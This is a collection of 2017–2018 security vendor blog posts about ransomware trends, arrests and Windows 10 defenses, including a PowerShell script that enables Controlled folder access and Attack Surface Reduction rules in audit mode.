With Windows 10, however, in addition to stronger defense at the infection vector, corporate networks were safer from this damaging threat because several technologies are available to stop or detect Bad Rabbit's attempts to spread across networks using exploits or hardcoded user names and passwords.

More importantly, during the Bad Rabbit outbreak, detonation-based machine learning models in the Windows Defender AV cloud protection service, with no human intervention, correctly classified the malware 14 minutes after the very first encounter. These detonation-based ML models are part of several layers of machine learning and artificial intelligence technologies that evaluate files in order to reach a verdict on suspected malware. Using this layered approach, Windows Defender AV protected Windows 10 devices with cloud protection enabled from Bad Rabbit within minutes of the outbreak.

Figure 4. Windows 7 and Windows 10 platform defenses against Bad Rabbit

As these outbreaks demonstrated, ransomware has indeed become a highly complex threat that can be expected to continue evolving in 2018 and beyond. The multiple layers of next-generation security technologies on Windows 10 are designed to disrupt the attack methods that we have previously seen in highly specialized malware but now also see in ransomware.

Ransomware protection on Windows 10

For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.

Controlled folder access, however, is but one layer of defense. Ransomware and other threats from the web can be blocked by Microsoft Edge, whose exploit mitigation and sandbox features make it a very secure browser. Microsoft Edge significantly improves web security by using Windows Defender SmartScreen's reputation-based blocking of malicious downloads and by opening pages within low-privilege app containers.

Windows Defender Antivirus also continues to enhance defense against threats like ransomware. Its advanced generic and heuristic techniques and layered machine learning models help catch both common and rare ransomware families. Windows Defender AV can detect and block most malware, including never-before-seen ransomware, using generics and heuristics, local ML models, and metadata-based ML models in the cloud. In the rare cases where a threat slips past these layers of protection, Windows Defender AV can protect patient zero in real time using analysis-based ML models, as demonstrated in a real-life case where a customer was protected from a very new Spora ransomware in a matter of seconds. In even rarer cases of inconclusive initial classification, additional automated analysis and ML models can still protect customers within minutes, as happened during the Bad Rabbit outbreak.

Windows 10 S locks down devices from unauthorized content by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser. This streamlined, Microsoft-verified platform seals common entry points for ransomware and other threats.

Reducing the attack surface for ransomware and other threats in corporate networks

For enterprises and small businesses, the impact of ransomware is graver. Losing access to files can mean disrupted operations. Big enterprise networks, including critical infrastructures, fell victim to ransomware outbreaks. The modern enterprise network is under constant assault by attackers and needs to be defended on all fronts.

Windows Defender Exploit Guard locks down devices against a wide variety of attack vectors. Its host intrusion prevention capabilities include the following components, which block behaviors commonly used in malware attacks:

  • Attack Surface Reduction (ASR) is a set of controls that blocks common ransomware entry points: Office-, script-, and email-based threats that download and install ransomware; ASR can also protect from emerging exploits like DDEDownloader, which has been used to distribute ransomware
  • Network protection uses Windows Defender SmartScreen to block outbound connections to untrusted hosts, such as when trojan downloaders connect to a malicious server to obtain ransomware payloads
  • Controlled folder access blocks ransomware and other untrusted processes from accessing protected folders and encrypting files in those folders
  • Exploit protection (replacing EMET) provides mitigation against a broad set of exploit techniques that are now being used by ransomware authors
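As an added example (not code from the Microsoft post), the following PowerShell turns on the Controlled folder access feature described above together with a handful of the ASR rules, in audit mode first, and then pulls the Exploit Guard events they generate so an administrator can review what would have been blocked. The protected folder and allowed application paths are placeholders; the rule GUIDs and event IDs are the ones Microsoft documents for these features.

```powershell
# Added example, not from the Microsoft post: configure Windows Defender Exploit
# Guard (Controlled folder access + ASR rules) with the Defender cmdlets, then
# review the audit/block events. Run in an elevated session on Windows 10 1709+.

# --- Controlled folder access -------------------------------------------------
# AuditMode logs writes by unauthorized apps instead of blocking them, so the
# allow list can be completed before switching to Enabled.
Set-MpPreference -EnableControlledFolderAccess AuditMode

# Protect folders beyond the defaults (Documents, Pictures, ...). Placeholder path.
Add-MpPreference -ControlledFolderAccessProtectedFolders 'D:\Shares\Finance'

# Allow a trusted line-of-business app that legitimately writes there. Placeholder path.
Add-MpPreference -ControlledFolderAccessAllowedApplications 'C:\Program Files\ExampleLOB\lob.exe'

# --- Attack Surface Reduction rules -------------------------------------------
# Rules covering the Office-, script- and email-based entry points named above.
$asrRules = @{
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
}
foreach ($id in $asrRules.Keys) {
    # AuditMode first; change to Enabled after reviewing event 1122 hits.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions AuditMode
    Write-Host "ASR rule $id ($($asrRules[$id])) set to AuditMode"
}

# --- Verify the resulting configuration ---------------------------------------
$pref = Get-MpPreference
[PSCustomObject]@{
    ControlledFolderAccess = $pref.EnableControlledFolderAccess   # 0=Disabled 1=Enabled 2=AuditMode
    ProtectedFolders       = $pref.ControlledFolderAccessProtectedFolders
    AllowedApplications    = $pref.ControlledFolderAccessAllowedApplications
    AsrRuleIds             = $pref.AttackSurfaceReductionRules_Ids
    AsrRuleActions         = $pref.AttackSurfaceReductionRules_Actions
} | Format-List

# --- What did Exploit Guard see? ----------------------------------------------
# Events land in the Defender operational log:
#   1121 ASR rule blocked      1122 ASR rule audited
#   1123 CFA blocked a write   1124 CFA audited a write
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 1121, 1122, 1123, 1124
} -MaxEvents 50 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message |
    Format-Table -Wrap
```

Review the 1122 and 1124 audit events for a few days before flipping the rules and Controlled folder access to Enabled, so that legitimate software (backup agents, installers, document tools) is on the allow list before enforcement starts.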

Additionally, the industry-best browser security in Microsoft Edge is enhanced by Windows Defender Application Guard, which brings Azure cloud grade isolation and security segmentation to Windows applications. This hardware isolation-level capability provides one of the highest levels of protection against zero-day exploits, unpatched vulnerabilities, and web-based malware.

For emails, Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers against ransomware attacks that begin with email. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Integrated security for enterprises

Windows Defender Advanced Threat Protection allows SecOps personnel to stop the spread of ransomware through timely detection of ransomware activity in the network. Windows Defender ATP's enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware attack kill-chain, enabling SecOps to promptly investigate and respond to ransomware attacks.

With Windows 10 Fall Creators Update, Windows Defender ATP was expanded to include seamless integration across the entire Windows protection stack, including Windows Defender Exploit Guard, Windows Defender Application Guard, and Windows Defender AV. This integration is designed to provide a single pane of glass for a seamless security management experience.

With all of these security technologies, Microsoft has built the most secure Windows version ever with Windows 10. While the threat landscape will continue to evolve in 2018 and beyond, we don't stop innovating and investing in security solutions that continue to harden Windows 10 against attacks. The twice-per-year feature update release cycle reflects our commitment to innovate and to make it easier to disrupt successful attack techniques with new protection features. Upgrading to Windows 10 not only means decreased risk; it also means access to advanced, multi-layered defense against ransomware and other types of modern attacks.


Tanmay Ganacharya (@tanmayg)
Principal Group Manager, Windows Defender Research


*Edited 01/11/2018 to remove the statement “Windows 10 has a much larger install base than Windows 7“.




Ransomware: Screen Lockers vs. Encryptors

It’s December 1989, and Joseph L. Popp, an American evolutionary biologist from Harvard, walks into his local post office carrying a large stack of envelopes stamped “PC Cyborg Corporation”. He carefully slides each one into the “Outgoing” slot. Finished, Popp exits the post office, unaware he’s just kickstarted one of the most lucrative cybercrime activities of the 21st century: ransomware.

A continent away, a female researcher at the World Health Organization opens one of Popp’s envelopes. Inside is a 5 ¼-inch floppy disk with instructions to carry out a research survey to test the risks of contracting AIDS. Excited, she inserts the disk expecting to see cutting-edge research into a virus currently plaguing the world. Instead, she receives a computer virus.

The computer display reads, “Restart your computer now.” She shuts her PC down and reboots. Nothing. “Turn on your printer,” the computer suddenly demands. The printed paper exits inch by inch, finally revealing a ransom note demanding $189 for a “licensing fee” in exchange for a decryption key. The money is to be mailed to a P.O. box in Panama. If the money is not sent, then decades of research data will be deleted.

Joseph Popp mailed 20,000 of these envelopes to 90 countries around the globe before the FBI captured him at his parents’ home in Ohio. Fearful of the breach, some researchers preemptively deleted decades worth of data, even though Popp’s crude ransomware was later easily defeated by computer techs. One Italian AIDS organization reportedly lost 10 years of work.

Popp’s story is the first ransomware attack, and it illustrates how cybercriminals prey on our hopes and fears. The Harvard biologist’s malware bears little resemblance to today’s strains. In just three decades, ransomware has gone from post office packages to self-replicating, viral monsters capable of infecting hundreds of thousands of computers around the world.

Today, ransomware attacks are on the rise. A recent Verizon study shows a 50 percent increase in 2017 alone. Ransomware is popular among cybercriminals because it’s the most profitable malware in existence today.

Ransomware works just like a real-life hostage situation. Someone kidnaps your data and demands money. There are two basic types of ransomware: encryptors and screen lockers.

Encryptors infect your devices and turn your data into unreadable $&@%#* gibberish. Screen lockers shut off access to your computer by taking over the operating system. They deny access to the data but don’t encrypt it.
If you know which type of ransomware you’re dealing with, you have a better chance of getting your money back.

Screen Lockers

Ransomware works for one simple reason — it attacks our emotions. The fear of losing your family photos or that novel you’ve been working on is palpable. Fear is what gives cyberthieves the power to manipulate. Here are some common ransomware scams and screen lockers.

Metropolitan Police scam

As you’re scrolling through your Facebook feed, a pop-up window appears out of nowhere. It has an official looking coat of arms next to the words “METROPOLITAN POLICE” in all caps, so you know it’s serious business. The message below reads: “You are accused of viewing/storage and/or dissemination of banned pornography (child pornography/zoophilia/rape etc.)”.

After a slight pause to consider what the “etc.” might be, your backbone drops 50 degrees and a knot forms in your gut. You make a hasty mental run through the last websites you’ve visited.

Disgusted at the accusation, you maneuver your cursor to close the window, but nothing happens. Your computer is locked, and the only way to unlock it is to pay a “$300 fine” for your alleged digital indiscretions. Now, a live video feed suddenly pops up. On your laptop screen, you see your own face staring back at you. You’re horrified. Someone has hacked your webcam and is spying on you. Welcome to the Metropolitan Police ransomware attack.

How did this happen? Many types of ransomware infect systems through phishing emails that trick users into visiting malicious websites or downloading infected attachments. Hackers use false accusations, threats of incarceration, and voyeurism to motivate victims into paying ransoms.

Should you start packing for a trip to prison? No. The Metropolitan Police attack is a scam and doesn’t directly threaten your data through encryption. The only malware you have on your computer is the script running the pop-up window and accessing your computer. Nevertheless, the ransomware is effective at intimidating people enough to pay the “fine”. Never pay the ransom. Instead, download antivirus removal software.

FBI MoneyPak scam

The FBI MoneyPak scam is a variation on the Metropolitan Police attack and uses the same types of intimidation. The pop-up looks like an official FBI notice, warning users they’ve infringed copyright laws by illegally downloading files like MP3s, movies, and software. Although the FBI MoneyPak scam doesn’t hijack your webcam, it does deploy a similar scare tactic, claiming authorities can identify you through your IP address.

Cyberthieves demand payment of the ransom through the online wallet service MoneyPak, a competitor to other sites like PayPal or Serve. Hackers may also require a prepaid debit card. Again, the MoneyPak attack is a scam, not a legitimate ransomware attack that threatens your data.

Protect yourself from these types of scams by enabling automatic updates for your operating systems.

Encryptors

Recent cybersecurity studies show encryptors as the most effective forms of ransomware today. Hackers are developing more sophisticated forms of encryptors, which are not only harder to detect but are capable of replicating themselves. Unlike basic screen lockers, encryptors do threaten your data.

CryptoLocker

Inspired by viruses like the Metropolitan Police scam, hackers have developed data-threatening ransomware like CryptoLocker, which hijacks users’ documents and gives the victim 72 hours to pay the ransom. To kick up the drama, an ominous clock is included with CryptoLocker that begins a countdown to data doomsday.

CryptoLocker infections come from an email containing ZIP files and passwords for activation. When you open the email and enter the password, a trojan virus is deployed on your system and begins encrypting your hard drive. The hacker then makes a private key that becomes the only access to decrypting the data. If you don’t pay the ransom, the key is destroyed and the data stays encrypted.

Keep your data out of hackers’ hands by taking away their power to destroy it. Keep your data backed up in a separate drive or in the cloud.

WannaCry Attacks

On Friday, May 12th, 2017, North Korea launched an enormous ransomware attack that spread around the globe. The WannaCry attacks of 2017 were the world’s most widespread and destructive ransomware attack to date — infecting more than 230,000 computers in 150 countries. The hackers required a $300 ransom payment, a clear signal they were targeting small businesses, organizations, and individuals.

WannaCry ransomware is feared in cybersecurity circles for its ability to self-replicate. WannaCry doesn’t need you to open an email or download an attachment from a website. It replicates through a worm virus, sending copies of itself throughout the internet.

WannaCry gains entry through vulnerabilities in your operating system and takes over your computer, encrypting your data and demanding a ransom. Like most data-destructive ransomware, by the time users discover they’re infected, it’s too late.

Ransomware has become exponentially more sophisticated and destructive since Joseph Popp snail mailed his infected floppy disks. Analog delivery methods have given way to more autonomous forms as cyberthieves mix and match malware characteristics to create new strains. In June of 2017, cybersecurity experts discovered a new form of ransomware called Petya, which includes features of both screen lockers and encryptors. If you’re worried about ransomware, protecting yourself is fairly simple. Follow tips for avoiding ransomware and invest in comprehensive antivirus software.


The post Ransomware: Screen Lockers vs. Encryptors appeared first on Panda Security Mediacenter.

December 2017: The Month in Ransomware

Ransomware activity was on a fairly high level till mid-December but slowed down by the end of the month, perhaps due to threat actors’ holiday spree. Some of the newsmaking events included the onset of the first-ever blackmail virus targeting network-attached storage devices, the breach of California’s voter database, and arrests of CTB-Locker and Cerber […]

The post December 2017: The Month in Ransomware appeared first on The State of Security.

3 Malware Trends to Watch Out for in 2018

We already know the security industry witnessed several significant ransomware attacks in 2017. Some of these campaigns derived at least part of their success from recent developments among malware families more generally. These trends will no doubt continue to shape bad actors’ offensives and how defenders can hope to protect against them in 2018. Digital […]

The post 3 Malware Trends to Watch Out for in 2018 appeared first on The State of Security.

Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist

‘Twas the night after Christmas, when all through the house
All the smart toys were buzzing and beeping about,
The chargers were plugged near the chimney with care,
Without a clue that the hackers soon would be there.

With the height of the season now behind us, you may be experiencing a bit of a holiday hangover. But as you wade through the holiday fallout of wrapping paper, instruction manuals, battery packs, and downloads, don’t forget that the most important step to your family enjoying its cache of digital gifts is protecting them.

McAfee’s Most Hackable Toys 2017 survey revealed our shared habits of connectivity minus solid safeguards. What we know: While most of us realize the importance of protecting our internet-connected devices, we aren’t too concerned with making device security a priority.

So, now that you’ve purchased that new smartphone, drone, smart toy, or appliance, take that next simple step to secure your expanding digital home. Here’s a short, post-holiday checklist to help get you started.

Smart Gift Checklist

Settings, passwords, software. Once you’ve powered up your new device: 1) Make sure it’s password protected with two-step authentication. 2) Set a PIN or passcode to lock your device. 3) Install the latest software versions as soon as possible and update them regularly. 4) Protect your new devices with additional security software if possible. 5) Avoid downloading suspicious apps and never click on strange links that arrive via email, messenger, or text. 6) And here’s a biggie: If you are selling, donating, or recycling your old devices, make sure you wipe them clean.

Research the risks. According to the same McAfee study, some of the most popular digital gifts of 2017 include tablets, smartphones, drones, digital assistants, and connected toys and appliances — all of which come with inherent security risks. With the growing list of smart devices, hackers have a million new entryways into our homes. Google the name and model of your new gift and read about possible security holes. Another valuable resource is online reviews posted by people who have encountered security issues.

‘Take Five’ before having fun. Securing a new gift often takes five minutes, but it’s a must in today’s wired world. Go into your new product’s privacy settings and change manufacturer settings and set a new password. Keep the process simple and allow your kids to do it alongside you so that device security is more likely to become a habit.

Don’t be duped by cute. From fuzzy talking puppies to adorable dolls, toys can also carry massive security risks. It’s important to research if there have been any reported security vulnerabilities with toys you’ve purchased or have been gifted, so you know how to secure them. Don’t let a toy’s appearance lull you into a false sense of security. Remember: It may look like a kitty cat, but if it connects to the world wide web, then it’s a computer that could be transmitting data to a remote server. When using connected toys: 1) Use toys in places with trusted and secured wi-fi. 2) Monitor your child’s activity with the toys (such as conversations and voice recordings) through the toy’s partner parent application, if available. 3) Take time to read the toy’s disclosures and privacy policies.

Refresh passwords on your home network. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Service Provider) since they are often less secure. And, make it a point to change your passwords regularly.

It’s impossible to protect against all risks, but you can frustrate a hacker’s plans by putting up some security obstacles. Even though security and privacy risks come with our new gifts, it’s clear that the demand for faster, better, more impressive digital products is here to stay. Taking the time to boost your family’s security will help make sure this holiday remains a happy one into the New Year and beyond.

The post Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist appeared first on McAfee Blogs.

Two Romanians Charged With Hacking Police CCTV Cameras Before Trump Inauguration

Remember how some cybercriminals shut down most of Washington D.C. police's security cameras for four days ahead of President Donald Trump's inauguration earlier this year? Just a few days after the incident, British authorities arrested two people in the United Kingdom, identified as a British man and a Swedish woman, both 50-year-old, on request of U.S. officials. But now US federal court

The Year Cybersecurity Made Primetime

Grey-Sloan Memorial Hospital, the fictional hospital on the television drama “Grey’s Anatomy,” was suddenly brought to a halt Nov. 14 at the hands of ransomware. The No. 3 drama on broadcast television, a venerable franchise of 14 seasons and 300 episodes, reflected the harsh reality faced by many. WannaCry, Petya, and Equifax entered dinner table conversation and late-night talk show monologues. In 2017 cybercrime made primetime.

Shonda Rhimes, creator of “Grey’s Anatomy,” tweets about the ransomware hit on Grey-Sloan Memorial

The events that transpired this year put cybersecurity on everyone’s mind. The stories of ransomware and malware found their way into homes, schools, and businesses – everyday life.

The Attacks That Changed Everything

In May, the ransomware WannaCry took center stage. True to its name, WannaCry was worth its weight in tears: 150 countries impacted, 250,000 machines infected, 16 United Kingdom medical centers taken down, all in just one day. The ransom was paid, and expert analysis ensued. The motive: disruption. As Raj Samani, Chief Scientist at McAfee stated: “The game has changed. The reality is that any organization can hire someone to disrupt a competitor’s business operations for less than the price of a cup of coffee.”

Taking cues from WannaCry, the Petya/NotPetya malware emerged a month later as its successor. The next global cyberattack leveraged the same vulnerability, but was nastier when infecting systems. Instead of locking away files and extorting money from victims, Petya/NotPetya was a wiper – deleting all files from affected devices.

The threat landscape was not just populated by cyberattacks, but also a data breach deemed the worst in recent memory. The Equifax breach exposed crucial personal identification of roughly 143 million consumers in the United States. This data included names, addresses, birthdates, driver’s license data and Social Security numbers. “We need to view the Equifax breach as a catalyst moment for rethinking the way we handle identification for U.S. citizens,” said Steve Grobman, senior vice president and chief technology officer for McAfee.

Rethink we did. These attacks, and other notable ones such as Bad Rabbit, the Uber data breach, the KRACK Wi-Fi attack, and more, changed how the cybersecurity industry responds to threats.

Cause and Effect

These attacks moved the needle. Cybercriminals were upping their game. These attacks mandated that cybersecurity must be faster, smarter, and more effective. Christiaan Beek, lead scientist and principal engineer at McAfee, says our improved response time to ransomware attacks confirms that’s happening: “The cybersecurity world is indeed responding faster than before, especially after WannaCry, which was another wake-up call… The moment researchers see that a decryptor is available, we go on and continue to hunt down the next one or learn from the previous ones and start innovating or fine-tuning our products.”

Looking Ahead

Now that cybersecurity is on prime time, what happens? We’re paying attention. Does that mean we’re prepared?

McAfee Chief Executive Officer Chris Young thinks we still have a ways to go. “It’s nearly 2018. And from the discussions I have weekly, it’s clear that business leaders understand far more about the risk of cyber threats today than they did even a few years ago. However, so many business leaders I talk to still want to know if they’re doing everything they can to protect their companies. Answer: They’re not.”

Young recommends a “Culture of Security” – a paradigm shift in philosophy and approach from the executive boardroom to new employees on their first day. Leaders must demonstrate a new priority, whether it’s impeccable password and virtual private network use, or cloud computing adoption only under the guidance of cybersecurity professionals. “Businesses need to think security first,” Young says. “Whether that’s in designing new products and services, signing partnership agreements, in hiring new employees, or anything else.”

Malware is not the star of the show. It’s the villain, but a powerful one. Cybersecurity must adapt to address it. McAfee wrapped up 2017 by announcing the upcoming acquisition of cloud provider Skyhigh Networks, which will become part of the McAfee Cloud Security Business Unit. Skyhigh will join a McAfee portfolio that includes market-leading products in the endpoint and security operations center (SOC). Partnering in an open ecosystem pulls these major strengths together in a new and agile way.

Welcome, 2018. New tools and a new “Culture of Security” are ready to take on new threats.

The post The Year Cybersecurity Made Primetime appeared first on McAfee Blogs.

McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker

In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

CTB Locker

CTB Locker, also known as Critroni, is known as one of the largest ransomware families—helping to drive a new ransomware surge of 165 percent in 2015 as one of the top three ransomware families, and earning a spot as No. 1 just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—CTB Locker and CryptoWall malware families helped to fill the gap.

In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000 USD, where people could buy the first versions for $1,500 USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

A CTB Locker affiliate server.
An example of CTB Locker source code.

Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

Attacks Begin to Grow

During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch seemed to originate from one of the largest telco providers. The emails claimed to have the latest bill attached. There was no bill, of course, rather CTB Locker asking for around $400 USD of ransom to return files. The grammar and word usage were near perfect—not what we commonly observe—and the names in the email were proof of a well-prepared campaign. More than 200 cases in the Netherlands alone were filed with regards to these infections.

With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

Following our research, we were kept updated and were informed that in the early morning of December 14, operation “Bakovia” started. The initial research was on the CTB Locker ransomware, but based on information from the U.S. Secret Service, it was determined that the same suspected gang was also linked to distribution of Cerber ransomware—another major family.

The Arrests

During the operation in East Romania, six houses were searched and the investigators seized a significant amount of hard drives, laptops, external storage, cryptocurrency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

Watch video of arrests. 

The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

Imperva’s Top 10 Blogs of 2017

I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world’s attention in 2017.

Several stories rose to the top as either most read by you, particularly relevant to today’s cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I’ve compiled our top 10 blog posts from 2017.

1. What’s Next for Ransomware: Data Corruption, Exfiltration and Disruption

The WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to protect against it, but our post on what’s next for ransomware garnered even more attention—it was our most read post of the year.

2. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts

Apache Struts made headlines all over the place in 2017. The vulnerability we wrote about in March hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: CVE-2017-9791 and CVE-2017-9805.)

3. Top Insider Threat Concern? Careless Users. [Survey]

We surveyed 310 IT security professionals at Infosecurity Europe in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization’s data at risk. (We shared more about insider threats in this infographic.)

4. Uncover Sensitive Data with the Classifier Tool

In July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate—over 500 downloads and counting—not surprising given it helps jump start the path to compliance with the GDPR. Our blog post walked through the steps of how to use the tool.

5. Professional Services for GDPR Compliance

Speaking of the GDPR, the new data protection regulation coming out of the EU was on everyone’s radar this year. We wrote a LOT about GDPR, including who is subject to the regulation, what rules require data protection technology, and the penalties for non-compliance. However, our post on the professional services we offer for GDPR compliance drove the most traffic on this topic by far.

6. The Evolution of Cybercrime and What It Means for Data Security

Hackers’ tactics may change, but what they’re after doesn’t—your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the changing nature of cybercrime and app and data accessibility create risk, and the essentials of application and data protection in this ever-changing world.

7. Move Securely to the Cloud: WAF Requirements and Deployment Options

Moving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed requirements and deployment options for evaluating a WAF for the cloud. (We also wrote about the benefits of a hybrid WAF deployment and the pros and cons of both cloud and on-prem WAFs.)

8. Clustering and Dimensionality Reduction: Understanding the “Magic” Behind Machine Learning

Everywhere you turned in 2017 you heard about AI and machine learning and the impact they’re having, or will have, on essentially everything. Two of Imperva’s top cybersecurity researchers explained in detail some of the techniques used in machine learning and how they’re applied to identify improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)

9. Can a License Solve Your Cloud Migration Problem?

Gartner published their 2017 Magic Quadrant for Web Application Firewalls (WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today’s changing deployment and infrastructure model. In this post we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.

10. The Uber Breach and the Case for Data Masking

Last but not least, we couldn’t ignore the Uber breach. Hard to believe in today’s world that login credentials were shared in a public, unsecured forum, but that’s what happened. The breach did highlight an important issue, that of production data being used in development environments. It’s a bad idea; we explained why in this post. Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fool’s gold.

Looking Into the World of Ransomware Actors Reveals Some Surprises

During the preparations for our keynotes at McAfee’s recent MPOWER conference, we brainstormed a few topics we wanted to share with the audience. Ransomware was definitely on our agenda, but so much has already been said and written on the subject. What could we add that would be interesting?

We hit on the angle: to dive into this shady world and learn about the people behind these campaigns. There are several ways to approach this. We could go into forums and look for the individuals who discuss these campaigns or offer ransomware for sale. But that would be very time consuming and the chance of finding the right individuals would be small. There is a better way.

In most samples of ransomware, once the malware executes and files are encrypted, the “ransom note” appears. Either a dropped background image or a text file contains the details. During 2017 we saw many of these notes contain an email address for questions or for payment details and releasing files.


We looked at three months of unique ransomware samples and extracted either the images or the notes that contained the contact addresses. As new ransomware families popped up in our tracker, we verified them and added the addresses—because these fresh attacks made it likely the authors would interact with us.

But how could we convince the actors to answer our questions? We took the role of students working on a master’s thesis and asked the actors if they would be willing to answer a few questions. For a couple of weeks we lived the role of students, eating lots of pizza, drinking sodas, and so on. (You have to live the role, right?)

We sent our emails and queried the actors who responded. One of our first observations was that of all the emails we retrieved, about 30 percent were either fake or nonexistent. So in these cases when files were encrypted and the victim decided to pay, using email to send evidence of payment was useless. The money was gone (as well as the files).

During the first week of our research we received answers back from some of the actors, but most were not willing to cooperate. That’s no surprise: They were cautious about revealing their identity.

During the second week, we had better luck and started to chat with a few. That number grew, and after a few weeks we had a great collection of conversations with the actors.

“Fast, easy, and safe”

When we asked why they started a career in ransomware, most answered with variations on “enough money” and “fast, easy, and safe,” especially when using anonymous email services and cryptocurrency for payments.

Homemade vs. Off the Shelf

Most of the actors we spoke with wrote their own ransomware. They had looked at the published source code but were clever enough to come up with their own variants that contained new techniques or different approaches to keep detections low. The longer they stayed out of sight of endpoint security solutions, the longer was their opportunity to make money.

Spending Their Ill-Gotten Gains

They spend the revenue they gained from their campaigns in various ways: travel, cars. One had many affiliates working for him, so he was soon going to buy a house. One of the most surprising answers was that one turned to ransomware to “pay off his debts.”

Willing to Negotiate

Although they often have the image of being ruthless, almost all of them claimed a willingness to negotiate the ransom price in case victims could not afford to pay the demanded amount.

Tracking the Authors

One of the actors was so enthusiastic that he wanted to sell us ransomware code so we could pay off our college debts. Based on his answers and sharing of information, we noticed that he was not a very experienced actor and he gave clues on his whereabouts. In one of the conversations, he shared some examples, but the data was not scrubbed. By correlating the data he provided with other information, such as email time zones and mistakes in his English, we traced him to Dakar, Senegal. He not only sends ransomware but also sells botnets and other fraud-related services.

We found the research eye opening. Now we just need a few weeks in the gym to work off all the sodas and pizzas.

For those suffering from a ransomware attack, you have three options. The first two are bad: lose your files, or pay the ransom and hope (with no guarantee) for a key to unlock your files. The best option is to start with a visit to NoMoreRansom.org to see if a decryption tool is available.

Meanwhile, remember the standard advice on reducing your risk of picking up ransomware: Keep your OS, security, and application software up to date; exercise a healthy dose of skepticism even when you see messages that appear to come from legitimate sources; and do not click on links or open files from unknown names or organizations.


Learn more about the threat statistics we gathered in Q3, including ransomware in the McAfee Labs Threats Report, December 2017 and follow the team on Twitter at @McAfee_Labs.

The post Looking Into the World of Ransomware Actors Reveals Some Surprises appeared first on McAfee Blogs.

McAfee Labs Reports All-Time Highs for Malware in Latest Count

In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and the use of malicious code in macros that invokes PowerShell to execute it, so-called fileless attacks.

In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack.

Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

